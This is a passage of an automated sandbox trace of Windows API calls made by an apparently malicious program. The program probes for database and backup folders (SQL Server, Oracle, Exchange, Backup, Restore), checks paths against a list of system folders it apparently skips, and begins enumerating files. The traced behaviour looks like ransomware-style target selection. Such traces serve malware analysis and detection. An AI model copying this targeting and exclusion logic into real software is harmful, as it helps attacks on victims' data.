Files\\Common Files\\Microsoft Shared\\Filters") returned 1 [0109.214] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.214] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.214] GlobalLock (hMem=0x450004) returned 0x593998 [0109.214] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.215] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@鼦W黺W企@\x18㽜V\x18\x1b")) returned 0xffffffff [0109.219] GetLastError () returned 0x3 [0109.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft 
SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@麌W企@\x18㼔V\x181")) returned 0xffffffff [0109.220] GetLastError () returned 0x2 [0109.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.220] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@퍴X企@\x18㥔X\x18;")) returned 0xffffffff [0109.220] GetLastError () returned 0x2 [0109.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: 
lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㩄X\x18D")) returned 0xffffffff [0109.221] GetLastError () returned 0x2 [0109.223] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.223] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.223] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: 
lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@麌W企@\x18퍴X\x18j")) returned 0xffffffff [0109.224] GetLastError () returned 0x2 [0109.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.224] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㥔X\x18q")) returned 0xffffffff [0109.224] GetLastError () returned 0x2 [0109.224] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: 
lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.224] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\퍰X\x90") returned 6 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@刄X企@\x18㩄X\x18y")) returned 0xffffffff [0109.225] GetLastError () returned 0x2 [0109.225] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.225] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.225] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, 
ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@V企@\x18㥔X\x18\x81")) returned 0xffffffff [0109.225] GetLastError () returned 0x2 [0109.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@鳜W企@\x18㩄X\x18\x88")) returned 0xffffffff [0109.226] GetLastError () returned 0x2 [0109.226] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.226] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X ") returned 6 [0109.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.227] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@刄X企@\x18㥔X\x18\x8f")) returned 0xffffffff [0109.227] GetLastError () returned 0x2 [0109.227] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㩀X ") returned 6 [0109.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.228] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@V企@\x18㩄X\x18\x97")) returned 0xffffffff [0109.228] GetLastError () returned 0x2 [0109.228] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.229] GlobalLock (hMem=0x450004) returned 0x591988 [0109.229] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.229] GlobalUnlock (hMem=0x450004) returned 0 [0109.229] GlobalLock (hMem=0x450004) returned 0x591988 [0109.229] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.229] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.229] GlobalUnlock (hMem=0x450004) returned 0 [0109.229] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.229] GlobalUnlock (hMem=0x45000c) returned 0 [0109.229] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.229] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.229] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.229] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.229] 
GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.229] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.230] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.230] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.230] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.230] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.230] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.230] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a38, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.230] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.230] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.230] GlobalUnlock (hMem=0x45000c) returned 0 [0109.231] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.231] GlobalLock (hMem=0x450004) returned 0x593998 [0109.231] GlobalHandle (pMem=0x591988) returned 
0x45000c [0109.231] GlobalUnlock (hMem=0x45000c) returned 0 [0109.231] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.231] GlobalUnlock (hMem=0x450004) returned 0 [0109.231] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.231] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.231] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.231] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.232] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application 
data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.233] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.233] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.234] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.234] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.234] 
CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.234] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.235] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.235] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.236] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.236] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.236] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.236] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.236] GlobalLock (hMem=0x450004) returned 0x591988 [0109.236] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.236] GlobalUnlock (hMem=0x450004) returned 0 [0109.236] GlobalLock (hMem=0x450004) returned 0x591988 [0109.321] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.321] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.321] GlobalUnlock (hMem=0x450004) returned 0 [0109.321] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.321] GlobalUnlock (hMem=0x45000c) returned 0 [0109.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.322] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.322] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0109.322] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.322] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.322] GlobalUnlock (hMem=0x45000c) returned 0 [0109.322] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.322] GlobalLock (hMem=0x450004) returned 0x593998 [0109.322] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.322] GlobalUnlock (hMem=0x45000c) returned 0 [0109.322] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.322] GlobalUnlock (hMem=0x450004) returned 0 [0109.322] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
